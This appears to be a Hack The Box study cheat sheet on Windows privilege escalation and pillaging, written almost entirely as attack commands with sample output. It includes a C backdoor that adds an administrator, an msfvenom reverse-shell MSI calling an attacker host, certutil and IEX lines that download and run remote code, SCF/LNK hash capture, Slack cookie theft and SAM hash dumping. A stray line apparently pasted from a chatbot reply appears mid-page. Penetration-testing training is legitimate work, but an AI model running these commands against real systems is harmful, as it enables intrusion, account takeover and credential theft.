H1HTB

Additional Techniques

Interacting with Users

Traffic Capture

Check if Wireshark is installed

PS C:\mrci0x1> Get-WmiObject Win32_Product | Where-Object { $_.Name -like "*Wireshark*" }
IdentifyingNumber : {E089B4F1-1817-4C93-BF4C-77C5EB8075F1}
Name              : Wireshark 3.2.0
Vendor            : The Wireshark developer community
Version           : 3.2.0
Caption           : Wireshark 3.2.0

Start capturing traffic with net-creds

mrci0x1@htb$ python3 net-creds.py -i eth0
[FTP] 10.10.10.50 -> USER admin
[FTP] 10.10.10.50 -> PASS password123

Analyze PCAP (if available)

mrci0x1@htb$ python3 net-creds.py -p capture.pcap
[SMB] 10.10.10.70 -> Username: user1, Password: mypassword

Process Command-Line Monitoring

Monitoring script (loop)

PS C:\mrci0x1> while($true){ $process = Get-WmiObject Win32_Process | Select-Object CommandLine; Start-Sleep 1; $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine; Compare-Object -ReferenceObject $process -DifferenceObject $process2 }

Hosting the script

mrci0x1@htb$ python3 -m http.server 80

Executing the script remotely

PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1')
InputObject                                           SideIndicator
-----------                                           -------------
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd} =>

Exploiting Vulnerable Services (Docker Example)

Check if Docker is installed

PS C:\mrci0x1> Get-WmiObject Win32_Product | Where-Object { $_.Name -like "*Docker*" }
IdentifyingNumber : {5B07FA1E-2E2F-4E4B-A7F3-00F09CA1C571}
Name              : Docker Desktop
Vendor            : Docker Inc.
Version           : 2.0.0.3
Caption           : Docker Desktop

Verify folder permissions

PS C:\mrci0x1> icacls "C:\ProgramData\DockerDesktop\version-bin"
C:\ProgramData\DockerDesktop\version-bin Everyone:(OI)(CI)(F)

Build malicious executable (example code)

#include <stdlib.h>
int main() {
    system("C:\\Windows\\System32\\cmd.exe /c net localgroup administrators backdoor /add");
    return 0;
}

Place payload into folder

PS C:\mrci0x1> copy docker-credential-wincred.exe C:\ProgramData\DockerDesktop\version-bin

Capturing Hashes with Malicious SCF Files

Prepare malicious SCF file

mrci0x1@htb$ echo "fake icon file" > /home/user/share/legit.ico
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Run Responder

mrci0x1@htb$ sudo responder -wrf -v -I tun0
[SMB] NTLMv2-SSP Username : WINLPE-SRV01\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WINLPE-SRV01:815c504e7b06ebda:<...SNIP...>

Crack the hash

mrci0x1@htb$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Recovered........: 1/1 (100.00%) Digests
Hash.Target......: Administrator::WINLPE-SRV01:<...>:Welcome1

Capturing Hashes with Malicious LNK Files

Generate malicious .lnk file

PS C:\mrci0x1> $objShell = New-Object -ComObject WScript.Shell; $lnk = $objShell.CreateShortcut("C:\Users\htb-student\Desktop\legit.lnk"); $lnk.TargetPath = "\\10.10.14.51\@pwn.png"; $lnk.Save()

(Alternative) Generate with Lnkbomb

mrci0x1@htb$ lnkbomb -t \\10.10.14.3\@pwn.png -o legit.lnk

Deploy .lnk file to writable share

mrci0x1@htb$ cp legit.lnk /mnt/share/

Start Responder

mrci0x1@htb$ sudo responder -I tun0 -w -d
[SMB] NTLMv2-SSP Username : WINLPE-SRV01\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WINLPE-SRV01:afbd2e53bda4:<...SNIP...>

Crack hash (same as above)

mrci0x1@htb$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Recovered........: 1/1 (100.00%) Digests
Password.........: Welcome1

Pillaging

Perfect. I will give you very clean, exact commands with output — as you requested. Let’s go:

Enumerating Installed Applications

Listing Applications (Command Prompt)

C:\> dir "C:\Program Files"
 Volume in drive C has no label.
 Volume Serial Number is 900E-A7ED

 Directory of C:\Program Files

07/14/2022  08:31 PM    <DIR>          Adobe
07/14/2022  08:31 PM    <DIR>          Corsair
07/14/2022  08:31 PM    <DIR>          Google
07/14/2022  08:31 PM    <DIR>          Microsoft Office 15
07/14/2022  08:31 PM    <DIR>          mRemoteNG
07/14/2022  08:31 PM    <DIR>          OpenVPN
07/14/2022  08:31 PM    <DIR>          Streamlabs OBS
07/14/2022  08:31 PM    <DIR>          TeamViewer

Listing Applications (PowerShell)

PS C:\htb> $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\htb> $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\htb> $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
DisplayName                                         DisplayVersion    InstallLocation
-----------                                         --------------    ---------------
Adobe Acrobat DC (64-bit)                           22.001.20169      C:\Program Files\Adobe\Acrobat DC\
CORSAIR iCUE 4 Software                             4.23.137          C:\Program Files\Corsair\
Google Chrome                                       103.0.5060.134    C:\Program Files\Google\Chrome\
Microsoft Office Profesional Plus 2016 - es-es      16.0.15330.20264  C:\Program Files (x86)\Microsoft Office
Microsoft Office Professional Plus 2016 - en-us     16.0.15330.20264  C:\Program Files (x86)\Microsoft Office
mRemoteNG                                           1.62              C:\Program Files\mRemoteNG
TeamViewer                                          15.31.5           C:\Program Files\TeamViewer

Exploiting mRemoteNG

Locate Configuration File

PS C:\htb> ls C:\Users\julio\AppData\Roaming\mRemoteNG
Directory: C:\Users\julio\AppData\Roaming\mRemoteNG

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/21/2022   8:51 AM                Themes
-a----        7/21/2022   8:51 AM            340 confCons.xml
-a----        7/21/2022   8:51 AM            970 mRemoteNG.log

Decrypting Password (No Custom Password)

mrci0x1@htb$ python3 mremoteng_decrypt.py -s "sPp6b6Tr2iyXIdD/KFNGEWzzUyU84ytR95psoHZAFOcvc8LGklo+XlJ+n+KrpZXUTs2rgkml0V9u8NEBMcQ6UnuOdkerig=="
Password: ASDki230kasd09fk233aDA

Decrypting with Custom Password

mrci0x1@htb$ python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p admin
Password: ASDki230kasd09fk233aDA

Cracking Master Password (Bruteforce)

mrci0x1@htb$ for password in $(cat /usr/share/wordlists/fasttrack.txt); do \
> echo $password; \
> python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p $password 2>/dev/null; \
> done
Spring2017
Spring2016
admin
Password: ASDki230kasd09fk233aDA
admins

Abusing IM Clients (Slack Example)

Extracting Cookies from Firefox

PS C:\htb> copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
python3 cookieextractor.py --dbpath cookies.sqlite --host slack --cookie d
(201, '', 'd', 'xoxd-CJRafjAvR3UcF%2FXpCDOu6xEUVa3romzdAPiVoaqDHZW5A9oOpiHF0G749yFOSCedRQHi%2FldpLjiPQoz0OXAwS0%2FyqK5S8bw2Hz%2FlW1AbZQ%2Fz1zCBro6JA1sCdyBv7I3GSe1q5lZvDLBuUHb86C%2Bg067lGIW3e1XEm6J5Z23wmRjSmW9VERfce5KyGw%3D%3D', '.slack.com', '/', 1974391707, ...)

Use this cookies:

Use a browser extension (e.g., Cookie-Editor for Firefox):

  • Navigate to slack.com.

  • Open Cookie-Editor, add the d cookie with the extracted value, and save.

  • Refresh the page to log in as the user.

Extracting Cookies from Chromium-Based Browsers

PS C:\htb> copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\htb> Invoke-SharpChromium -Command "cookies slack.com"
[*] Beginning Google Chrome extraction.
[X] Exception: Could not find file 'C:\Users\lab_admin\AppData\Local\Google\Chrome\User Data\\Default\Cookies'.
[*] Done.

Clipboard Monitoring

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\htb> Invoke-ClipboardLogger
https://portal.azure.com
Administrator@something.com
Sup9rC0mpl2xPa$$ws0921lk

Attacking Backup Servers (restic Example)

Check if restic exists

Get-ChildItem C:\Windows\System32\restic.exe

Initialize Repository

PS C:\htb> mkdir E:\restic2; restic.exe -r E:\restic2 init
enter password for new repository:
enter password again:
created restic repository fdb2e6dd1d at E:\restic2

Backup Files

PS C:\htb> $env:RESTIC_PASSWORD = 'Superbackup!'
PS C:\htb> restic.exe -r E:\restic2\ backup C:\SampleFolder
repository fdb2e6dd opened successfully, password is correct
created new cache
Files: 1 new
snapshot 9971e881 saved

Backup with Volume Shadow Copy

PS C:\htb> restic.exe -r E:\restic\ backup C:\Windows\System32\config --use-fs-snapshot
successfully created snapshot
error: Access is denied.
Warning: at least one source file could not be read

List Snapshots

PS C:\htb> restic.exe -r E:\restic2\ snapshots
ID        Time                 Host             Tags        Paths
9971e881  2022-08-09 14:18:59  PILLAGING-WIN01  C:\SampleFolder
b0b6f4bb  2022-08-09 14:19:41  PILLAGING-WIN01  C:\Windows\System32\config
afba3e9c  2022-08-09 14:35:25  PILLAGING-WIN01  C:\Users\jeff\Documents

Restore Snapshot

PS C:\htb> restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore

Dump SAM/SYSTEM

reg save HKLM\SAM C:\Restore\sam.hive
reg save HKLM\SYSTEM C:\Restore\system.hive

Dump hashes

secretsdump.py -sam sam.hive -system system.hive LOCAL

Miscellaneous Techniques

LOLBAS

File Transfer with certutil

C:\mrci0x1> certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

Encode file

C:\mrci0x1> certutil -encode file1 encodedfile

Decode file

PS C:\mrci0x1> certutil -decode encodedfile file2

Execute DLL via rundll32

PS C:\mrci0x1> rundll32.exe \\10.10.14.3\share\malicious.dll,EntryPoint

Check LOLBAS site for bin https://lolbas-project.github.io/

AlwaysInstallElevated

Check registry values

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate malicious MSI (Linux)

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

Start netcat listener

nc -lnvp 9443

Execute MSI on target

PS C:\mrci0x1>  msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Expected Output

connect to [10.10.14.3] from (UNKNOWN) [10.129.43.33] 49720
Microsoft Windows [Version 10.0.18363.592]
whoami
nt authority\system

CVE-2019-1388 (hhupd.exe)

CVE-2019-1388 is a privilege escalation vulnerability in the Windows Certificate Dialog, allowing a low-privilege user to launch a browser as SYSTEM by exploiting a signed executable (hhupd.exe) with a specific certificate field (SpcSpAgencyInfo).

  1. Right-click hhupd.exe and select Run as administrator.

  2. In the UAC prompt, click Show information about the publisher’s certificate.

  3. In the Certificate dialog, check the Details tab for the SpcSpAgencyInfo field with a hyperlink ( eg.. https://www.verisign.com/repository/CPS ).

  4. In the General tab, click the Issued by hyperlink and click OK

  5. A browser launches as SYSTEM (verify in Task Manager).

  6. Right-click the webpage, select View page source.

  7. Right-click in the source view, select Save as.

  8. In the Save As dialog, enter C:\\Windows\\System32\\cmd.exe and press Enter.

PS C:\mrci0x1>  C:\Windows\System32\cmd.exe

Verify escalation

PS C:\mrci0x1> whoami

Expected Output

PS C:\mrci0x1> nt authority\system

Enumerating Scheduled Tasks

Enumerate via schtasks (CMD)

PS C:\mrci0x1>  schtasks /query /fo LIST /v

Enumerate via PowerShell

PS C:\mrci0x1> Get-ScheduledTask | select TaskName,State

Check permissions on script folders

PS C:\mrci0x1>  .\accesschk64.exe /accepteula -s -d C:\Scripts\

Exploit writable script

PS C:\mrci0x1>  Add-Content -Path C:\Scripts\db-backup.ps1 -Value "net localgroup administrators htb-student /add"

Verify escalation

PS C:\mrci0x1> whoami

Expected Output

nt authority\system

User/Computer Description Fields

Get Local Users Descriptions

PS C:\mrci0x1> Get-LocalUser

Get Computer Description

PS C:\mrci0x1> Get-WmiObject -Class Win32_OperatingSystem | select Description

Example Output

Name            Enabled Description
Administrator   True    Built-in account for administering the computer/domain
secsvc          True    Network scanner - do not change password

Mounting VHDX/VMDK Files & Dumping Hashes

Search for backup files (with Snaffler)

C:\mrci0x1> snaffler.exe -s \\FILE01\backups -o snaffler_output.txt

Mount .vmdk on Linux

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk

Mount .vhdx on Linux

guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

Mount .vhdx on Windows

PS C:\mrci0x1> Mount-VHD -Path C:\backups\WEBSRV10.vhdx -ReadOnly

Extract Registry Hives

  • Navigate to:

/mnt/vmdk/Windows/System32/config/

  • Copy: SAM, SECURITY, SYSTEM

Dump hashes with secretsdump

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Crack hashes with Hashcat

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
PreviousCitrix BreakoutNextHTB

Last updated